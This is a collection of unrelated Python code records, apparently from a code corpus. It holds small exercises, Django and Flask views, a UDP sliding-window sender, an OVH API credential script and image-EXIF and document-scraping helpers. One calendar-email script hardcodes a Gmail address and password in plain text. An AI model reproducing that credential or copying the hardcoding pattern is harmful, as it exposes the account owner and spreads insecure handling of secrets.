+{"seq_id":"79778519","text":"def foo(date_time, temperature, threshold):\n\tresult = []\n\tprevious = None\n\n\tfor t in range(0, len(date_time)):\n\t\tif temperature[t] > threshold:\n\t\t\tif previous < threshold:\n\t\t\t\tresult.append(date_time[t])\n\t\tprevious = temperature[t]\n\treturn result\n\n# for testing purposes\nif __name__ == '__main__':\n\tT = [1460545900, 1460545910, 1460545920, 1460545930, 1460545940, 1460545950]\n\tR = [0, 7, 12, 18, 8, 17]\n\tQ = 10 \n\tprint('> {}'.format(foo(T,R,Q)))","sub_path":"EchoMobile/SWE/pset3.py","file_name":"pset3.py","file_ext":"py","file_size_in_byte":445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"601996841","text":"'''\nCrie um programa que leia uma frase qualquer e diga se ela é um palíndromo,\ndesconsiderando os espaços.\n'''\n\nfrase = str(input('Digite uma frase: ')).strip()\nfrase = frase.split()\nfrase = ''.join(frase)\ninverso = ''\nfor i in range(len(frase)-1, -1, -1):\n inverso += frase[i]\n\n\nprint(f'O inverso de {frase} é {inverso}')\nif frase == inverso:\n print('Temos um palíndromo')\nelse:\n print('Não temos um palindromo!')","sub_path":"ex053.py","file_name":"ex053.py","file_ext":"py","file_size_in_byte":430,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"525232837","text":"import email\r\nimport smtplib\r\nimport datetime as dt\r\nimport icalendar\r\nimport pytz\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.base import MIMEBase\r\nfrom email.mime.text import MIMEText\r\nfrom email.utils import COMMASPACE, formatdate\r\nfrom email import encoders\r\nimport os,datetime\r\nfrom datetime import date \r\n\r\ntoday = date.today() \r\nprint(type(today))\r\n\r\n# Imagine this function is part of a class which provides the necessary config data\r\ndef send_appointment(date, attendee_email, organiser_email, subj, description, location, start_hour, 
start_minute):\r\n # Timezone to use for our dates - change as needed\r\n tz = pytz.timezone(\"Europe/London\")\r\n start = tz.localize(dt.datetime.combine(date, dt.time(start_hour, start_minute, 0)))\r\n # Build the event itself\r\n cal = icalendar.Calendar()\r\n cal.add('prodid', '-//My calendar application//example.com//')\r\n cal.add('version', '2.0')\r\n cal.add('method', \"REQUEST\")\r\n event = icalendar.Event()\r\n event.add('attendee', attendee_email)\r\n event.add('organizer', organiser_email)\r\n event.add('status', \"confirmed\")\r\n event.add('category', \"Event\")\r\n event.add('summary', subj)\r\n event.add('description', description)\r\n event.add('location', location)\r\n event.add('dtstart', start)\r\n event.add('dtend', tz.localize(dt.datetime.combine(date, dt.time(start_hour + 1, start_minute, 0))))\r\n event.add('dtstamp', tz.localize(dt.datetime.combine(date, dt.time(6, 0, 0))))\r\n #event['uid'] = self.get_unique_id() # Generate some unique ID\r\n event.add('priority', 5)\r\n event.add('sequence', 1)\r\n event.add('created', tz.localize(dt.datetime.now()))\r\n\r\n # Add a reminder\r\n alarm = icalendar.Alarm()\r\n alarm.add(\"action\", \"DISPLAY\")\r\n alarm.add('description', \"Reminder\")\r\n # The only way to convince Outlook to do it correctly\r\n alarm.add(\"TRIGGER;RELATED=START\", \"-PT{0}H\".format(24)) #reminder_hours\r\n event.add_component(alarm)\r\n cal.add_component(event)\r\n\r\n # Build the email message and attach the event to it\r\n msg = MIMEMultipart(\"alternative\")\r\n\r\n msg[\"Subject\"] = subj\r\n msg[\"From\"] = organiser_email\r\n msg[\"To\"] = attendee_email\r\n msg[\"Content-class\"] = \"urn:content-classes:calendarmessage\"\r\n\r\n msg.attach(MIMEText(description))\r\n part_email = MIMEText('calendar;method=REQUEST') #this lines are for \r\n msg.attach(part_email) # outlook make it as calender #remove this lines for sending mail to gmail\r\n filename = \"invite.ics\"\r\n part = MIMEBase('text', \"calendar\", 
method=\"REQUEST\", name=filename)\r\n part.set_payload( cal.to_ical() )\r\n email.encoders.encode_base64(part)\r\n part.add_header('Content-Disposition', filename) #content discription\r\n part.add_header(\"Content-class\", \"urn:content-classes:calendarmessage\")\r\n part.add_header(\"Filename\", filename)\r\n part.add_header(\"Path\", filename)\r\n msg.attach(part)\r\n\r\n # Send the email out\r\n s = smtplib.SMTP('smtp.gmail.com',587)\r\n s.starttls()\r\n s.login(\"eswar.bbid@gmail.com\",\"eswar@1234\")\r\n s.sendmail(msg[\"From\"], [msg[\"To\"]], msg.as_string())\r\n s.quit()\r\n\r\n\r\n\r\nsend_appointment(date = today,attendee_email=\"eswar.kalakata@gmail.com\",organiser_email=\"eswar.bbid@gmail.com\",subj=\"python_practice\",description=\"outlook calender should be done \",location=\"madhapur\",start_hour= 1, start_minute= 55)\r\n'''import pytz\r\nfor tz in pytz.all_timezones:\r\n print(tz)'''\r\n\r\n\r\n","sub_path":"calender_email.py","file_name":"calender_email.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"227533845","text":"# coding=utf-8\n\n# Create your views here.\nfrom django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, get_object_or_404\n\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.core.urlresolvers import reverse\nimport json\nfrom django.core.paginator import Paginator, PageNotAnInteger, EmptyPage\nfrom app.customer.models.user import LuckIDInfo\n\n\n@login_required()\ndef lucknum_list(request):\n qd = request.GET\n lucknums = LuckIDInfo.objects.all().order_by('user_id')\n return render(request, 'lucknum/list.html', {'lucknums': lucknums})\n\n# 创建或修改\n@login_required()\ndef lucknum_new(request):\n if request.method == 'POST':\n qd = request.POST\n user_id = qd.get('user_id', \"\")\n id_type = qd.get('id_type', '')\n id_level = qd.get('id_level', '')\n id_assign = 
qd.get('id_assign', '')\n\n return HttpResponseRedirect(reverse(\"lucknum_list\"))\n else:\n qd = request.GET\n user_id = qd.get('user_id', \"\")\n id_type = 0\n id_level = 0\n id_assign = 0\n\n return render(request, 'lucknum/edit.html', {'user_id': user_id, 'id_type': id_type,'id_level':id_level,'id_assign':id_assign})","sub_path":"app/customer/views/lucknum.py","file_name":"lucknum.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"4419355","text":"from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n\t#Leave as empty string for base url\n\tpath('', views.home, name=\"home\"),\n\tpath('main/', views.main, name=\"main\"),\n\tpath('cart/', views.cart, name=\"cart\"),\n\tpath('checkout/', views.checkout, name=\"checkout\"),\n\tpath('men/', views.men, name=\"men\"),\n\tpath('women/', views.women, name=\"women\"),\n\tpath('durability/', views.durability, name=\"durability\"),\n\n \n]\n","sub_path":"ecommerce/store/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"320024536","text":"from selenium import selenium\nimport unittest, time, re\n\nclass add_1st_opportunity(unittest.TestCase):\n def setUp(self):\n self.verificationErrors = []\n self.selenium = selenium(\"localhost\", 4444, \"*chrome\", \"http://change-this-to-the-site-you-are-testing/\")\n self.selenium.start()\n \n def test_add_1st_opportunity(self):\n sel = self.selenium\n sel.open(\"/main_app\")\n sel.click(\"link=Add Opportunities\")\n sel.wait_for_page_to_load(\"30000\")\n sel.type(\"id_name\", \"Opportunity 1\")\n sel.type(\"id_amount\", \"$400\")\n sel.select(\"id_rate\", \"label=Annual\")\n sel.type(\"id_web\", \"www.opportunity1.com\")\n sel.click(\"id_cover\")\n sel.select(\"id_application\", \"label=Mail\")\n sel.type(\"id_instruction\", \"instructins\")\n 
sel.type(\"id_description\", \"decription\")\n sel.select(\"id_type\", \"label=Full time\")\n sel.click(\"//input[@value='submit']\")\n \n def tearDown(self):\n self.selenium.stop()\n self.assertEqual([], self.verificationErrors)\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"add_1st_opportunity.py","file_name":"add_1st_opportunity.py","file_ext":"py","file_size_in_byte":1110,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"650753105","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2017/12/1 9:24\n# @Author : fangjie\n# @email : 838379742@qq.com\n# @File : views.py\n__metaclass__ = type\nfrom flask import render_template,url_for,request\nfrom . import main\nfrom ..models import Article, Category,Setting\nfrom .. import db\nfrom collections import OrderedDict\n\n\n@main.route('/')\ndef index():\n page=request.args.get('page',1,type=int)\n setting=Setting.query.all()[0]\n pagination=Article.query.order_by(Article.timestamp.desc()).paginate(page,per_page=20,error_out=False)\n articles=pagination.items\n navbar=getNavbar()\n return render_template('main/index.html',articles=articles,pagination=pagination,navbar=navbar,setting=setting)\n\n\n@main.route('//',methods=['GET','POST'])\ndef article(name,article_id):\n article=Article.query.filter_by(id=article_id).first()\n setting = Setting.query.all()[0]\n navbar = getNavbar()\n breadcrumb=getBreadcrumb(article_id)\n return render_template('main/article.html',article=article,navbar=navbar,breadcrumb=breadcrumb,setting=setting)\n\ndef getBreadcrumb(article_id):\n first_category_id=Article.query.filter_by(id=article_id).all()[0].first_category_id\n second_category_id=Article.query.filter_by(id=article_id).all()[0].second_category_id\n first_category=Category.query.filter_by(id=first_category_id).all()[0]\n second_category = Category.query.filter_by(id=second_category_id).all()\n if second_category!=[]:\n 
second_category=second_category[0]\n return [first_category,second_category]\n else:\n return [first_category]\n\n@main.route('/artilce/',methods=['GET','POST'])\ndef list(name):\n page = request.args.get('page', 1, type=int)\n category_id=Category.query.filter_by(url_name=name).all()[0].id\n if Category.query.filter_by(id=category_id).all()[0].father_node==0:\n pagination=Article.query.filter_by(first_category_id=category_id).order_by(Article.timestamp.desc()).paginate(page, per_page=20, error_out=False)\n else:\n pagination = Article.query.filter_by(second_category_id=category_id).order_by(Article.timestamp.desc()).paginate(page, per_page=20, error_out=False)\n articles = pagination.items\n navbar = getNavbar()\n setting = Setting.query.all()[0]\n return render_template('main/index.html',articles=articles,pagination=pagination,navbar=navbar,setting=setting)\n\n\n\ndef getNavbar():\n categories=OrderedDict()\n for father_node in Category.query.filter_by(father_node='0').order_by(db.asc(Category.id)).all():\n child_nodes=[]\n if Category.query.filter_by(father_node=father_node.id).all()!=[]:\n for ca in Category.query.filter_by(father_node=father_node.id).all():\n child_nodes.append(ca)\n categories[father_node]=child_nodes\n return categories","sub_path":"app/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"331453367","text":"import sys\r\nimport random\r\nimport socket\r\nimport _thread\r\nimport time\r\nfrom timer import Timer\r\n\r\nraddr = ('localhost', 8080)\r\nsaddr = ('localhost', 0)\r\nsleep = 0.05\r\ntout = 0.5\r\nsend_timer = Timer(tout)\r\nwin_size = 7\r\nnext_frame_to_send = 0\r\nbase = 0\r\nmutex = _thread.allocate_lock()\r\nerrp = 10 #error prob of data packet\r\ndrop = 20 #drop probability due to network issues\r\n\r\n# Creates a packet from a sequence number and byte data\r\ndef make(seq_num, data = b''):\r\n 
seq_bytes = seq_num.to_bytes(4, byteorder = 'little', signed = True)\r\n if random.randint(1, errp) > 1:\r\n \terr_bytes = (0).to_bytes(4, byteorder = 'little', signed = True)\r\n else:\r\n \terr_bytes = (1).to_bytes(4, byteorder = 'little', signed = True)\r\n return seq_bytes + err_bytes + data\r\n\r\n# Creates an empty packet\r\ndef make_empty():\r\n return b''\r\n\r\n# Extracts sequence number and data from a non-empty packet\r\ndef extract(packet):\r\n seq_num = int.from_bytes(packet[0:4], byteorder = 'little', signed = True)\r\n err = int.from_bytes(packet[4:8], byteorder = 'little', signed = True)\r\n return seq_num, err, packet[8:]\r\n\r\n# Send thread\r\ndef send(sock, filename):\r\n\tglobal mutex\r\n\tglobal base\r\n\tglobal send_timer\r\n\r\n # Open the file\r\n\ttry:\r\n\t\tfile = open(filename, 'rb')\r\n\texcept IOError:\r\n\t\tprint('File Not Found')\r\n\t\treturn\r\n \r\n # Add all the packets to the buffer\r\n\tpbuffer = []\r\n\tseq_num = 0\r\n\r\n\twhile True:\r\n\t\tpkt_size = random.randint(512,1024)\r\n\t\tdata = file.read(pkt_size)\r\n\t\tif not data: break\r\n\t\tpbuffer.append(make(seq_num, data))\r\n\t\tseq_num += 1\r\n\r\n\tnum_pkts = len(pbuffer)\r\n\twin_size = 7\r\n\twin_size = min(win_size, num_pkts-base)\r\n\tnext_frame_to_send = 0\r\n\tbase = 0\r\n\r\n # Start the receiver thread\r\n\t_thread.start_new_thread(receive, (sock,))\r\n\r\n\twhile (base < num_pkts):\r\n\t\tmutex.acquire()\r\n # Send all the pbuffer in the window\r\n\t\twhile (next_frame_to_send < base + win_size):\r\n\t\t\tif (random.randint(1, drop) > 1):\r\n\t\t\t\tsock.sendto(pbuffer[next_frame_to_send],raddr)\r\n\t\t\tnext_frame_to_send += 1\r\n\r\n # Start the timer\r\n\t\tif (not send_timer.running()):\r\n\t\t\tsend_timer.start()\r\n\r\n # Wait until a timer goes off or we get an ACK\r\n\t\twhile (send_timer.running() and not send_timer.timeout()):\r\n\t\t\tmutex.release()\r\n\t\t\ttime.sleep(sleep)\r\n\t\t\tmutex.acquire()\r\n\r\n\t\tif (send_timer.timeout()): 
#Timeout\r\n\t\t\tsend_timer.stop();\r\n\t\t\tnext_frame_to_send = base\r\n\t\telse:\r\n\t\t\twin_size = min(win_size, num_pkts-base)\r\n\t\tmutex.release()\r\n\r\n # Send empty packet as end of file\r\n\tsock.sendto(make_empty(),raddr)\r\n\tfile.close()\r\n \r\n# Receive thread\r\ndef receive(sock):\r\n global mutex\r\n global base\r\n global send_timer\r\n\r\n while True:\r\n pkt, _ = sock.recvfrom(1024);\r\n ack, error, _ = extract(pkt);\r\n\r\n # If we get an ACK for the first packet\r\n if (error == 0):\r\n\t if (ack >= base):\r\n\t mutex.acquire()\r\n\t base = ack + 1\r\n\t send_timer.stop()\r\n\t mutex.release()\r\n\t else:\r\n\t \tmutex.acquire()\r\n\t \tsend_timer.stop();\r\n\t \tnext_frame_to_send = base\r\n\t \tmutex.release()\r\n\r\nif __name__ == '__main__':\r\n\tsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n\tsock.bind(saddr)\r\n\tfilename = sys.argv[1]\r\n\tsend(sock,filename)\r\n\tsock.close()","sub_path":"sender2.py","file_name":"sender2.py","file_ext":"py","file_size_in_byte":3276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"1162827","text":"\"\"\"\nПрограмма принимает действительное положительное число x и целое отрицательное число y.\nНеобходимо выполнить возведение числа x в степень y. 
Задание необходимо реализовать в виде функции my_func(x, y).\nПри решении задания необходимо обойтись без встроенной функции возведения числа в степень.\n\"\"\"\n\n\n# Решение №1\ndef pow_1(a: int, n: int) -> float:\n return a ** n\n\n\n# Решение №2\ndef pow_2(a: int, n: int) -> float:\n answer = 1\n for i in range(abs(n)):\n answer *= a\n if n > 0:\n return answer\n elif n < 0:\n return 1 / answer\n else:\n return 1\n\n\n# Решение №3\ndef pow_3(a: int, n: int) -> float:\n if n == 0:\n return 1\n elif n < 0:\n return 1 / a * pow_3(a, n + 1)\n else:\n return a * pow_3(a, n - 1)\n\n\nif __name__ == \"__main__\":\n print(pow_1(2, -5))\n print(pow_2(2, -5))\n print(pow_3(2, -5))\n","sub_path":"Lesson3/base_les3_4.py","file_name":"base_les3_4.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"155268549","text":"# -*- encoding: utf-8 -*-\n\nimport requests\nimport sys\nimport json\n\ndef __get_key(app_key, authorisation):\n data = '{{ \"accessRules\": {json_data} }}'.format(json_data = json.dumps(authorisation))\n # print(data)\n\n r = requests.post(\"https://eu.api.ovh.com/1.0/auth/credential\",\n headers = {\n \"X-Ovh-Application\" : app_key,\n \"Content-type\" : \"application/json\"\n },\n data = data)\n\n print(r.content)\n\n# this file provide ovh credential to admin\n# dns entry point\ndef dns(app_key, dns_list):\n\n authorisation = []\n for dns in dns_list.split(\",\"):\n authorisation.append({ \"method\" : \"POST\", \"path\": f\"/domain/zone/{dns}/*\" })\n authorisation.append({ \"method\" : \"DELETE\", \"path\": f\"/domain/zone/{dns}/*\" })\n\n __get_key(app_key, authorisation)\n\n\ndef network(app_key, projects_list):\n authorisation = []\n for serviceName in projects_list.split(\",\"):\n authorisation.append({ \"method\" : \"GET\", \"path\": f\"/cloud/project/{serviceName}/instance\" })\n authorisation.append({ \"method\" : \"POST\", \"path\": 
f\"/cloud/project/{serviceName}/ip/*\" })\n authorisation.append({ \"method\" : \"GET\", \"path\": f\"/cloud/project/{serviceName}/ip/*\" })\n __get_key(app_key, authorisation)\n\ndef telephony(app_key, projects_list):\n authorisation = []\n authorisation.append({ \"method\" : \"GET\", \"path\": f\"/telephony/*\" })\n for billingAccount in projects_list.split(\",\"):\n authorisation.append({ \"method\" : \"POST\", \"path\" : f\"/telephony/{billingAccount}/service/*\"})\n authorisation.append({ \"method\" : \"POST\", \"path\" : f\"/telephony/{billingAccount}/eventToken\"})\n\n __get_key(app_key, authorisation)\n\ndef usage():\n print(\"\"\"usage OPTION ...\nOPTIONS can be :\n- dns app_key dns1[,dns2...]\n- network app_key project1[,project2...]\n- telephony app_key\n\"\"\")\n\ndef main():\n if len(sys.argv) == 4 :\n if sys.argv[1] == \"dns\":\n dns(sys.argv[2], sys.argv[3])\n elif sys.argv[1] == \"network\":\n network(sys.argv[2], sys.argv[3])\n elif sys.argv[1] == \"telephony\":\n telephony(sys.argv[2], sys.argv[3])\n else:\n usage()\n\n else:\n usage()\n\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"ovh_cli/credential.py","file_name":"credential.py","file_ext":"py","file_size_in_byte":2317,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"242073034","text":"import numpy as np\nimport exifread\nimport piexif\nfrom PIL import Image as pImage, ImageDraw\nimport deepGeoUtils as utils\n\n\nclass Image:\n def __init__(self, url, image_path):\n self._path_ = utils.create_folder(image_path)\n self._thumbnail_path_ = utils.create_folder(self._path_ + 'thumbnail')\n self._file_name_ = utils.download_image(url, image_path)\n self.mask = [None, None]\n self._exif_ = self._extract_exif_()\n self._width_ = 0\n self._height_ = 0\n self._create_thumbnail_()\n if \"Image Orientation\" in (self._exif_.keys()):\n self._save_(_path=self._path_+self._file_name_,\n is_new=False,\n image=utils.image_roataion(self._open_(), 
self._exif_['Image Orientation']))\n\n def _save_(self, _path, is_new=True, image=None):\n if is_new:\n ext = self._file_name_.split(\".\")[-1]\n path_ = utils.create_folder(_path)\n name = utils.create_name(ext, path_)\n path = path_ + name\n else:\n path = _path\n bexif = self._extract_bexif_()\n if image is None:\n return False\n if bexif is None:\n image.save(path)\n else:\n image.save(path, exif=bexif)\n return path\n\n def _open_(self):\n return pImage.open(self._path_ + self._file_name_).convert('RGB')\n\n def _create_thumbnail_(self):\n image = self._open_()\n self._width_, self._height_ = image.size\n size = (256, 256)\n try:\n image.thumbnail(size)\n except:\n pass\n self._save_(image=image, is_new=False, _path=self._thumbnail_path_+self._file_name_)\n\n def _extract_exif_(self):\n with open(self._path_ + self._file_name_, 'rb') as f:\n tags = exifread.process_file(f, details=False)\n return tags\n\n def _extract_bexif_(self):\n image = self._open_()\n try:\n exif_dict = piexif.load(image.info[\"exif\"])\n exif_bytes = piexif.dump(exif_dict)\n except Exception as es:\n print(es, \" Exif is not include\")\n exif_bytes = None\n return exif_bytes\n\n def _set_mask_(self, masks, colors):\n y, x, z = self.to_array().shape\n self.mask[0] = np.zeros((y, x, z + 1))\n if masks is not None:\n self.mask[0] = utils.set_mask(self.mask[0], masks, colors)\n self.mask[0] = pImage.fromarray(np.uint8(self.mask[0]))\n self.mask[1] = ImageDraw.Draw(self.mask[0])\n\n def _set_text_(self, text, point, color):\n set_color = (color[0], color[1], color[2])\n self.mask[1].text(point, text, fill=set_color)\n\n def _set_box_(self, box, color):\n y1, x1, y2, x2 = box\n set_color = (color[0], color[1], color[2])\n self.mask[1].rectangle([x1, y1, x2, y2], outline=set_color)\n\n def get_file_name(self):\n return self._file_name_\n\n def get_location(self, is_point=False):\n exif = self._exif_\n lon=None\n lat=None\n if \"GPS GPSLongitude\" in exif.keys():\n ref = None\n if \"GPS 
GPSLongitudeRef\" in exif.keys():\n ref = exif[\"GPS GPSLongitudeRef\"]\n lon = utils.exif_to_data(exif[\"GPS GPSLongitude\"], ref)\n if \"GPS GPSLatitude\" in exif.keys():\n ref = None\n if \"GPS GPSLatitudeRef\" in exif.keys():\n ref = exif[\"GPS GPSLatitudeRef\"]\n lat = utils.exif_to_data(exif[\"GPS GPSLatitude\"], ref)\n if lon is not None:\n if is_point:\n return \"POINT(\" + str(lon) + \" \" + str(lat) + \")\"\n else:\n return {\"Longitude\": lon, \"Latitude\": lat}\n else:\n return None\n\n def get_direction(self, is_json=False):\n exif = self._exif_\n if \"GPS GPSImgDirection\" in exif.keys():\n data = utils.exif_to_data(exif[\"GPS GPSImgDirection\"], exif[\"GPS GPSImgDirectionRef\"])\n if is_json:\n return {\"Direction\": data}\n else:\n return data\n else:\n return None\n\n def get_distance(self, is_json=False):\n exif = self._exif_\n if \"GPS GPSDestDistance\" in exif.keys():\n distance = utils.exif_to_data(exif[\"GPS GPSDestDistance\"], exif[\"GPS GPSDestDistance\"])\n if is_json:\n return {\"Distance\": distance}\n else:\n return distance\n else:\n return None\n\n def get_altitude(self, is_json=False):\n exif = self._exif_\n if \"GPS GPSAltitude\" in exif.keys():\n altitude = utils.exif_to_data(exif[\"GPS GPSAltitude\"], exif[\"GPS GPSAltitudeRef\"])\n if is_json:\n return {\"Direction\": altitude}\n else:\n return altitude\n else:\n return None\n\n def get_datetime(self, is_json=False, is_timestamp=False):\n exif = self._exif_\n if \"Image DateTime\" in exif.keys():\n date_ = str(exif[\"Image DateTime\"]).split(\" \")\n timestamp = date_[0].replace(\":\", '-') + \" \" + date_[1]\n timestamp = utils.check_format_date(timestamp)\n else:\n timestamp = \"1970-01-01 00:00:00\"\n if is_timestamp:\n timestamp = utils.datatime_to_timestamp(timestamp)\n if is_json:\n return {\"DateTime\": timestamp}\n else:\n return timestamp\n\n def get_fov(self, view_ang=66, distance=100):\n loc = self.get_location()\n dirc = self.get_direction()\n dist = distance\n if dist 
is 100 or dist is None:\n dist = self.get_distance()\n if dist is None:\n dist = 100\n return utils.data_to_polygon(loc['Longitude'], loc['Latitude'], dirc, dist, view_ang)\n\n def get_size(self, is_json=False):\n if is_json:\n return {\"width\": self._width_, \"height\": self._height_}\n else:\n return self._width_, self._height_\n\n def on_draw(self, path, boxes=None, masks=None, class_ids=None, scores=None, class_names=None, box_show=True):\n n = len(boxes)\n if n > 0:\n colors = utils.create_colors(n)\n self._set_mask_(masks, colors)\n for i in range(n):\n if class_ids is not None:\n y1, x1, _, _ = boxes[i]\n score = \"\"\n if scores is not None:\n score = \" (\"+str(scores[i])+\")\"\n self._set_text_(class_names[class_ids[i]]+score, (x1, y1), colors[i])\n if box_show is True:\n self._set_box_(boxes[i], colors[i])\n image = self._open_().convert(\"RGBA\")\n mask_image = self.mask[0]\n if mask_image:\n image = pImage.alpha_composite(image, mask_image)\n return self._save_(path, image=image.convert(\"RGB\"))\n\n def to_array(self):\n image = self._open_()\n if image is not None:\n return np.array(image)\n else:\n return None\n","sub_path":"deepgeo/src/deepGeoImage.py","file_name":"deepGeoImage.py","file_ext":"py","file_size_in_byte":7068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"646770378","text":"import numpy as np\n\nclass EnergyCalibration(object):\n def __init__(self, positions, energies):\n self.pos = positions\n self.energies = energies\n\n\n def getAxis(self, x, out = None):\n fitting_degree = 3\n coeff = np.polyfit(self.pos, self.energies, fitting_degree)\n if out is None:\n return np.poly1d(coeff)(x), None\n else:\n out['ea'], out['fit'] = np.poly1d(coeff)(x), None\n","sub_path":"nosey/calibration.py","file_name":"calibration.py","file_ext":"py","file_size_in_byte":440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} 
+{"seq_id":"326999945","text":"\"\"\"\ntrack 1\n所有人一个东西都不买\n\nformat:\nid,category\n1,1 1 1 0 1 0 0 0 0\n\nauthor: lzhbrian (https://lzhbrian.me)\ndate: 2021.7.13\n\"\"\"\nfrom tqdm import tqdm\n\noutput_filename = '../submission_track1/all_purchase_0items_track1_20210713.csv'\n\nNUM_USERS = 206254\nPOP_EXPOSE_LIST = '0 0 0 0 0 0 0 0 0'\n\nfp = open(output_filename, 'w')\nprint('id,category', file=fp)\nfor i in tqdm(range(1, NUM_USERS + 1)):\n\tprint('%s,%s' % (i, POP_EXPOSE_LIST), file=fp)\n","sub_path":"code/all_purchase_0items_track1_20210713.py","file_name":"all_purchase_0items_track1_20210713.py","file_ext":"py","file_size_in_byte":457,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"596148056","text":"from urllib.request import urlopen\nfrom bs4 import BeautifulSoup\n\nfrom io import StringIO\nimport csv\n\n\nfrom pdfminer.pdfinterp import PDFResourceManager, process_pdf\nfrom pdfminer.converter import TextConverter\nfrom pdfminer.layout import LAParams\nfrom io import open\n\n\ndef readText1():\n # textPage = urlopen('http://www.pythonscraping.com/pages/warandpeace/chapter1.txt')\n textPage = urlopen('http://www.pythonscraping.com/pages/warandpeace/chapter1-ru.txt')\n\n print( str(textPage.read(), 'utf-8') )\n\ndef readText2():\n html = urlopen(\"http://en.wikipedia.org/wiki/Python_(programming_language)\")\n bsObj = BeautifulSoup(html, 'lxml')\n content = bsObj.find(\"div\", {\"id\": \"mw-content-text\"}).get_text()\n content = bytes(content, 'UTF-8')\n content = content.decode('UTF-8')\n\n print( content )\n\ndef readCSV():\n data = urlopen(\"http://pythonscraping.com/files/MontyPythonAlbums.csv\").read().decode('ascii', 'ignore')\n dataFile = StringIO(data)\n # csvReader = csv.reader(dataFile)\n #\n # for row in csvReader:\n # print(\"The album \\\"\" + row[0] + \"\\\" was released in \" + str(row[1]))\n\n\n dictReader = csv.DictReader(dataFile)\n print(dictReader.fieldnames)\n for row in 
dictReader:\n print(row)\n\ndef readPDF(pdfFile):\n rsrcmgr = PDFResourceManager()\n retstr = StringIO()\n laparams = LAParams()\n device = TextConverter(rsrcmgr, retstr, laparams=laparams)\n\n process_pdf(rsrcmgr, device, pdfFile)\n device.close()\n\n content = retstr.getvalue()\n retstr.close()\n return content\n#\n# pdfFile = urlopen(\"http://pythonscraping.com/pages/warandpeace/chapter1.pdf\")\n# # pdfFile = open(\"../Python网络数据采集.pdf\", 'rb')\n# outputString = readPDF(pdfFile)\n# print( outputString )\n# pdfFile.close()\n\nfrom zipfile import ZipFile\nfrom io import BytesIO\n\ndef readDocx(pdfPath):\n wordFile = urlopen(pdfPath).read()\n wordFile = BytesIO(wordFile)\n document = ZipFile(wordFile)\n xml_content = document.read('word/document.xml')\n\n wordObj = BeautifulSoup( xml_content.decode('utf-8'), 'lxml' )\n textStrings = wordObj.findAll('w:t')\n for textElem in textStrings:\n print( textElem.text )\n\nreadDocx('http://pythonscraping.com/pages/AWordDocument.docx')","sub_path":"pythonscrapy/009.py","file_name":"009.py","file_ext":"py","file_size_in_byte":2239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"330057394","text":"import json\r\nimport requests\r\n\r\nurl = input(\"Enter url : \")\r\n\r\nrequest = requests.get(url)\r\n\r\ndata_in_text = request.text\r\n\r\ndata = json.loads(data_in_text)\r\n\r\nfile_name = input(\"Enter file name : \")\r\n\r\njson_file = file_name+\".json\"\r\n\r\njson.dump(data , open(json_file,\"w\"))","sub_path":"PythonProgramsTraining/download_json_data.py","file_name":"download_json_data.py","file_ext":"py","file_size_in_byte":273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"12412684","text":"# -*- coding: utf-8 -*-\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output\nfrom pages import (\n overview,\n exploration,\n magnitud,\n 
relacion_otros_fenomenos,\n visualizacion_3D)\n# Connect to main app.py file\nfrom app import app\nimport pandas as pd\nimport plotly.express as px\n\n# Describe the layout/ UI of the app\napp.layout = html.Div(\n [dcc.Location(id=\"url\", refresh=False), html.Div(id=\"page-content\")]\n)\napp.config.suppress_callback_exceptions = True\n\n\n# Update page\n@app.callback(Output(\"page-content\", \"children\"), [Input(\"url\", \"pathname\")])\ndef display_page(pathname):\n\n if pathname == \"/dash-earthquake-analysis/magnitud\":\n return magnitud.layout\n elif pathname == \"/dash-earthquake-analysis/visualizacion-3d\":\n return visualizacion_3D.layout\n elif pathname == \"/dash-earthquake-analysis/relacion-otros-fenomenos\":\n return relacion_otros_fenomenos.layout\n elif pathname == \"/dash-earthquake-analysis/exploration\":\n return exploration.create_layout(app)\n else:\n return overview.create_layout(app)\n\n\nif __name__ == \"__main__\":\n app.run_server(debug=True)\n","sub_path":"eda/jose/dash-earthquake-analysis/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":1209,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"347173565","text":"\"\"\"webempresa URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/3.1/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to 